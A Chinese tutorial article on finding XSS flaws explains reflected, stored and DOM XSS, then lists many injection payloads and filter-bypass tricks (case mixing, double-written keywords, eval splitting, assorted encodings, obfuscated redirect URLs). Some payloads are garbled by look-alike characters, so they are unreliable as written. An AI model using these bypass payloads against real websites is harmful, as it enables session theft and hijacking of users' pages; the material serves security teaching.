网安教育
培养网络安全人才
技术交流、学习咨询
XSS 攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是 JavaScript ,但实际上也可以包括 Java , VBScript , ActiveX , Flash 或者甚至是普通的 HTML 。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和 cookie 等各种内容。
1.盗用 cookie,获取敏感信息。
2.利用植入 Flash,通过 crossdomain 权限设置进一步获取更高权限;或者利用 Java 等得到类似的操作。
3.利用 iframe、frame、XMLHttpRequest 或上述 Flash 等方式,以(被攻击)用户的身份执行一些管理动作,或执行一些一般的操作如发微博、加好友、发私信等操作。
4.利用可被攻击的域受到其他域信任的特点,以受信任来源的身份请求一些平时不允许的操作,如进行不当的投票活动。
5.在访问量极大的一些页面上的 XSS 可以攻击一些小型网站,实现 DDOS 攻击的效果 。
反射型跨站脚本( Reflected Cross-Site Scripting )是最常见,也是使用最广的一种,可将恶
意脚本附加到 URL 地址的参数中。反射型 XSS 的利用一般是攻击者通过特定手法(如电子邮件),诱使用户去访问一个包含恶意代 码的 URL ,当受害者点击这些专门设计的链接的时候,恶意代码会直接在受害者主机上的浏览器执 行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地方,常用来窃取客户端 Cookies 或进 行钓鱼欺骗。
存储型
持久型跨站脚本( Persistent Cross-Site Scripting )也等同于存储型跨站脚本( Stored
Cross-Site Scripting )。此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本,攻击者事先将恶意代码上传或储存到漏洞 服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。持久型 XSS 一般出现在网 站留言、评论、博客日志等交互处,恶意脚本存储到客户端或者服务端的数据库中。
DOM 型
传统的 XSS 漏洞一般出现在服务器端代码中,而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞,所以,受客户端浏览器的脚本代码所影响。客户端 JavaScript 可以访问浏览器的 DOM
文本对象模型,因此能够决定用于加载当前页面的 URL 。换句话说,客户端的脚本程序可以通过
DOM 动态地检查和修改页面内容,它不依赖于服务器端的数据,而从客户端获得 DOM 中的数据
(如从 URL 中提取数据)并在本地执行。另一方面,浏览器用户可以操纵 DOM 中的一些对象,例如 URL 、 location 等。用户在客户端输入的数据如果包含了恶意 JavaScript 脚本,而这些脚
本没有经过适当的过滤和消毒,那么应用程序就可能受到基于 DOM 的 XSS 攻击。
无任何过滤情况下一些常见标签
<scirpt>
<scirpt>alert("xss");</script>
<img>
<imgsrc=1οnerrοr=alert("xss");>
<input>
<inputοnclick="alert('xss');">
点击事件
<inputοnfοcus="alert('xss');">
竞争焦点,从而触发 onblur 事件
<inputοnblur=alert("xss")autofocus><inputautofocus>
通过 autofocus 属性执行本身的 focus 事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发
<inputοnfοcus="alert('xss');"autofocus>
<details>
<detailsοntοggle="alert('xss');">
使用 open 属性触发 ontoggle 事件,无需用户去触发
<detailsopenοntοggle="alert('xss');">
<svg>
<svgοnlοad=alert("xss");>
<select>
<selectοnfοcus=alert(1)></select>
通过 autofocus 属性执行本身的 focus 事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发
<selectοnfοcus=alert(1)autofocus>
<iframe>
<iframeοnlοad=alert("xss");></iframe>
<video>
<video><sourceοnerrοr="alert(1)">
<audio>
<audiosrc=xοnerrοr=alert("xss");>
<body>
<body/οnlοad=alert("xss");>
利用换行符以及 autofocus,自动去触发 onscroll 事件,无需用户去触发
<bodyοnscrοll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><inputautofocus>
<textarea>
<textareaοnfοcus=alert("xss");autofocus>
<keygen>
<keygenautofocusοnfοcus=alert(1)>// 仅限火狐
<marquee>
<marquee onstart=alert("xss")></marquee>//Chrome 不行,火狐和 IE 都可以
<isindex>
<isindextype=imagesrc=1οnerrοr=alert("xss")>// 仅限于 IE
利用 link 远程包含 js 文件——在无 CSP 的情况下才可以
<linkrel=importhref="http://127.0.0.1/1.js">
javascript 伪协议
<a>标签<ahref="javascript:alert(`xss`);">xss</a><iframe>标签<iframesrc=javascript:alert('xss');></iframe><img>标签<imgsrc=javascript:alert('xss')>//IE7 以下<form>标签<formaction="Javascript:alert(1)"><inputtype=submit>
其它
expression 属性<imgstyle="xss:expression(alert('xss''))">// IE7 以下<divstyle="color:rgb('' x:expression(alert(1))"></div>//IE7 以下<style>#test{x:expression(alert(/XSS/))}</style>// IE7 以下background 属性<tablebackground=javascript:alert(1)></table>// 在 Opera 10.5 和 IE6 上有效
有过滤的情况下
过滤空格——用 / 代替空格
<img/src="x"/onerror=alert( "xss" ); >
过滤关键字
大小写绕过
<ImGsRc=xonerRor=alert( "xss" ); >
双写关键字
有些 waf 可能会只替换一次且是替换为空,这种情况下我们可以考虑双写关键字
绕过<imimggsrsrcc=xonerror=alert( "xss" ); >
字符拼接
利用 eval
<imgsrc="x"onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">利用 top<script>top["al"+"ert"](`xss`);</script>
其它字符混淆
有的 waf 可能是用正则表达式去检测是否有 xss 攻击,如果我们能 fuzz 出正则的
规则,则我们就可以使用其它字符去混淆我们注入的代码了
下面举几个简单的例子
可利用注释、标签的优先级等
1.<<script>alert("xss");//<</script>
2.<title><img src=</title>><img src=x οnerrοr="alert(`xss`);"> //因为 title 标签
的优先级比 img 的高,所以会先闭合 title,从而导致前面的 img 标签无效
3.<SCRIPT>var a="\";alert("xss");//";</SCRIPT>编码绕过
Unicode 编码绕过
< img src ="x"onerror ="alert("xss")9;">< img src ="x"onerror ="eval('u0061u006cu0065u0072u0074u0028u0022u0078u0073u0073u0022u0029u003b')">
url 编码绕过
< img src ="x"onerror ="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"><iframesrc="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
Ascii 码绕过
< img src ="x"onerror ="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
hex 绕过
<imgsrc=xοnerrοr=eval('x61x6cx65x72x74x28x27x78x73x73x27x29')>
八进制
<imgsrc=xοnerrοr=alert('170163163')>
base64 绕过
<imgsrc="x"οnerrοr="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"><iframesrc="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
过滤双引号,单引号
1. 如果是 html 标签中,我们可以不用引号。如果是在 js 中,我们可以用反引号代替单双引号
<imgsrc="x"οnerrοr=alert(`xss`);>
2. 使用编码绕过,具体看上面我列举的例子,我就不多赘述了
过滤括号
当括号被过滤的时候可以使用 throw 来绕过
当括号被过滤的时候可以使用throw来绕过<svg/οnlοad="window.οnerrοr=eval;throw'=alertx281x29';">
过滤 url 地址——使用 url 编码
<img src="x"οnerrοr=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>
使用 IP
1. 十进制 IP
<img src="x"οnerrοr=document.location=`http://2130706433/`>
2. 八进制 IP
<img src="x"οnerrοr=document.location=`http://0177.0.0.01/`>
3.hex
<img src="x"οnerrοr=document.location=`http://0x7f.0x0.0x0.0x1/`>
4.html 标签中用 // 可以代替 http://
<img src="x"οnerrοr=document.location=`//www.baidu.com`>
5. 使用中文逗号代替英文逗号
如果你在你在域名中输入中文句号浏览器会自动转化成英文的逗号
<img src="x"οnerrοr="document.location=`http://www 。baidu 。com`">// 会自动跳转到百度
(一)过滤一些危险字符,以及转义& < > " ' /等危险字符 。
(二)HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie,攻击者完成 XSS 注入后也无法窃取此 Cookie。
(三)设置 CSP(Content Security Policy)
(四)输入内容长度限制
版权声明:本文为CSDN博主「xiaochuhe」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/xiaofengdada/article/details/122792268
版权声明:著作权归作者所有。如有侵权请联系删除
战疫期间,开源聚合网络安全基础班、实战班线上全面开启,学网络安全技术、升职加薪……有兴趣的可以加入开源聚合网安大家庭,一起学习、一起成长,考证书求职加分、升级加薪,有兴趣的可以咨询客服小姐姐哦!
加QQ(1005989737)找小姐姐私聊哦
原文始发于微信公众号(开源聚合网络空间安全研究院):纯干货之XSS漏洞挖掘的技巧分享
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论